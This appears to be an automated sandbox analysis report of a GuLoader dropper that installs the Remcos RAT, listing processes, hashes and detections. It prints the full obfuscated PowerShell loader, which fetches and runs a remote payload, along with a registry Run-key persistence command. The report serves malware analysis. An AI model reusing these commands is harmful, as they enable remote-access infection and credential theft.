(Fyrsternes 'St,r$GbakGCholLTotaoKu sbTazeADesaL han: W nOBahiVfodsEUnf R a.tfKl nlHyalOStemRMenti ,nodSe o Re,r= Slr Fode[ codSMi,rY TansVrelTSvr EByplm re.LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee .usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8 For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes $Alleluja78;"
                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2257431898.00000244184D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:03:40:01
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:03:40:12
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar 
aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae OpgaCha dSelseAflarTomjsSu.b[ Bip$ PreH madaDecriF odrReevsIzbatWalky Fonl FoliIndesEne tJac.sKorr]Akan=Dest$Ju eLFo eiR fov de eUnp lnyt y .kr ');$Netvrkslsningens=Fyrsternes ' Nor$SadhI PinmKa,smUssioStr,rPhaltPrinaSymmlBialicratsFi.eeAdrodTole. Ro.Dnsk,o DecwprotnGuailSengoT,kka u,bd BolFM noiR velBir e Me (Egyp$ Af.HexpeyTorepUdgae U,sridion ecoiPe ncScen,Ne.r$,ranBDolkaMaplrAutetGri.hWouloPhenl,mbloo rnmUncoeFllea w snnaal)tam. 
';$Bartholomean=$Ferias5;kaldedes (Fyrsternes 'Hier$ Ti gAll L tikOConvBTingaSkyplUnde: MisFTevaABomuNBehaFUnc aChokR WraoAce,n Bo AFlygd B.seR,mp1Gaml2 ,en8u io= Fun( Reot Fr,EAaresUn eT Re -SporPBrugaBun t Or,H.hum Fabr$SamfBPrseaPlisrVatit .mbHsupeo monL allOtredmSlaue Dela KarnKkke)Refi ');while (!$Fanfaronade128) {kaldedes (Fyrsternes 'Omga$ HungTsarl DenoRevebComiaReenlKrig:PalaOTenddSn oiUncosTurke TensDisktSy d=Mang$PendtFl trUnthu laneUdra ') ;kaldedes $Netvrkslsningens;kaldedes (Fyrsternes 'StegS Utnt claaQuadRQuadTOver-SabbSEverl Scaeres,EendeP Emm Vin4tige ');kaldedes (Fyrsternes 'Rygz$,rbegDo,elE poo Civb Sp a FinlBran:Hir.fnaivA Tu,n resFMethak adrCharOTudeNGisnAAcridDullEFire1 .kk2 Son8Apol= er(K.ngtBolveSproSKlipTC ck-.aanP LinAbraitGrusHaphy Tvan$f siB KonaH,tcRInteTExpuHLsenOTa.olVandoG.unM NagEDe cA PreNPerg)Cast ') ;kaldedes (Fyrsternes 'Stel$Su.egDebaL ChioD,ssBLionADiselRoya:Phy i TelNTeetDpunkeEft,NModtr ReaiS,ufGBriksGardF Reml SteY MalV ,inNNonciM llNDruiGTo aeRangRtabuN RedeV,de=Ha m$ En gInsplSenaOKanebEnj,ANonpl gro:EcottNaturOph.uNon ISmurnDyrpgA lv+I am+Pref%A,ch$.eskUAposD .roGBrneiP,ocfAdelTMesosDivibMet E UndhsystOReedv erEFortTAf.is Ups.D ggCTu eOBilbu MicN KryTT ta ') ;$Hypernic=$Udgiftsbehovets[$Indenrigsflyvningerne];}$Begravelsesaftale=340812;$Kuverts=30123;kaldedes (Fyrsternes 'Arbe$ SoeGS.bflStjiONonsB Su aUdstlGui : Bu.SIndvoCervLBilldGaloE dprHea i StaSQui TCholE HalNkachSanst J te=Acti ElogSpeceaarbtFort- E tCAfvaOAgniNPoohTCouneHumiNFlastWi,d Lovr$FlskbShipA O grBriltBelgHRenoOAc dlKultoHundM SkaeramiAVul nK.lo ');kaldedes (Fyrsternes 'Fred$w ndg Re,lVirgoBonbbUnbuaUnmulPr k:Or fSFagba ,admfranmPl ueRivenBa,ifRe.eaflakl Un.dfi neBattnFamieO kesAppe Afm= Tru Tilk[ GtsSG upyLysesChantCutleCircm P.d.Piz CKonooSnornLigkvCo se,iblrTeknt,eba]Meka: ydr: s lFKederDagko Senm O oBCr eaSubfs reveIn i6Revu4I feS FratCounrRavniFlaxnUnsmgLuxu(Bibe$LancSIncoo.virlOverdCause Decr Be iFlaksVltetTaabetilenMaltsChol)Fjer ');kaldedes 
(Fyrsternes 'St,r$GbakGCholLTotaoKu sbTazeADesaL han: W nOBahiVfodsEUnf R a.tfKl nlHyalOStemRMenti ,nodSe o Re,r= Slr Fode[ codSMi,rY TansVrelTSvr EByplm re.LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee .usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8 For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes $Alleluja78;"
                                                                                                  Imagebase:0x50000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2419273887.0000000008590000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2419849580.0000000009833000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:03:40:12
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:03:40:27
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:59'904 bytes
                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.2601743861.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4585582185.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.2602767372.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Target ID:10
                                                                                                  Start time:03:40:33
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
                                                                                                  Imagebase:0x1c0000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:11
                                                                                                  Start time:03:40:33
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:12
                                                                                                  Start time:03:40:33
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
                                                                                                  Imagebase:0xe90000
                                                                                                  File size:59'392 bytes
                                                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:15
                                                                                                  Start time:03:40:46
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\husdhpbhpulhbvjgwsomcgo"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:59'904 bytes
                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:16
                                                                                                  Start time:03:40:46
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\spywiilbdcdmdbgkndbgftixng"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:59'904 bytes
                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:17
                                                                                                  Start time:03:40:46
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:59'904 bytes
                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:18
                                                                                                  Start time:03:40:46
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:59'904 bytes
                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Reset < >
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9a854cbb660fe731bb905ebd0adc8554eefdb56982ffb13a9695789e4a0fa039
                                                                                                    • Instruction ID: 754b0c22578f1912ed44956f72b8703a607d0f1266ffb1ee20240b87ff9af81d
                                                                                                    • Opcode Fuzzy Hash: 9a854cbb660fe731bb905ebd0adc8554eefdb56982ffb13a9695789e4a0fa039
                                                                                                    • Instruction Fuzzy Hash: 13F1B670A08A8D8FEBA8DF28C8557E937D2FF55310F04426EE84DC7295DB78A9458B81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fd61b49a2e68144315f154eec4014aa4d501ce07cb9a8b061ea0dabb1e159a65
                                                                                                    • Instruction ID: f546fa9be0fb26919dfafbbc670de4b995bf6cbaa26a37d3ea8e7a5f919ed779
                                                                                                    • Opcode Fuzzy Hash: fd61b49a2e68144315f154eec4014aa4d501ce07cb9a8b061ea0dabb1e159a65
                                                                                                    • Instruction Fuzzy Hash: A1E1A470608A8E8FEBA8DF28C8657E977D1EF55310F14426EE84DC7291DE78A8458BC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7c48d855823181bbcf74811de135f819af75d6440f54cca6f099096318f26695
                                                                                                    • Instruction ID: 198ea6671b0826fdabec8232b62d004c6dcc9107230a24b7cabc70a89884c0b4
                                                                                                    • Opcode Fuzzy Hash: 7c48d855823181bbcf74811de135f819af75d6440f54cca6f099096318f26695
                                                                                                    • Instruction Fuzzy Hash: F6F14470A18A4D8FDF94DF5CC4A5AAD7BE2FFA9310F14416AD409E7295CA38E841CBC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 041e1d4b3f538de9d21378ef802539dffe7e54e687dbe1a9a9c85a5ae93fd468
                                                                                                    • Instruction ID: b7adeab5940b66b726e391d15b19b2bd9d8bdc86be76b707a9d1be17bc53738c
                                                                                                    • Opcode Fuzzy Hash: 041e1d4b3f538de9d21378ef802539dffe7e54e687dbe1a9a9c85a5ae93fd468
                                                                                                    • Instruction Fuzzy Hash: 36B19770608A4D8FDB69DF28C8557E93BE1FF56310F04426EE84DC7292DE78A945CB82
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2266394836.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34830000_powershell.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2266394836.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34830000_powershell.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2266394836.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34830000_powershell.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2266394836.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34830000_powershell.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2266394836.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34830000_powershell.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • String ID: \VFj
                                                                                                    • API String ID: 0-3286916545
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • String ID: (fgl$(fgl$(fgl$(fgl$(fgl$(fgl$(fgl$(fgl$tLYk
                                                                                                    • API String ID: 0-1671616529
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • String ID: (fgl$(fgl$(fgl$(fgl$(fgl$tLYk
                                                                                                    • API String ID: 0-1611006412
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • String ID: (fgl$(fgl$x.Xk$x.Xk$-Xk
                                                                                                    • API String ID: 0-4127336955
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
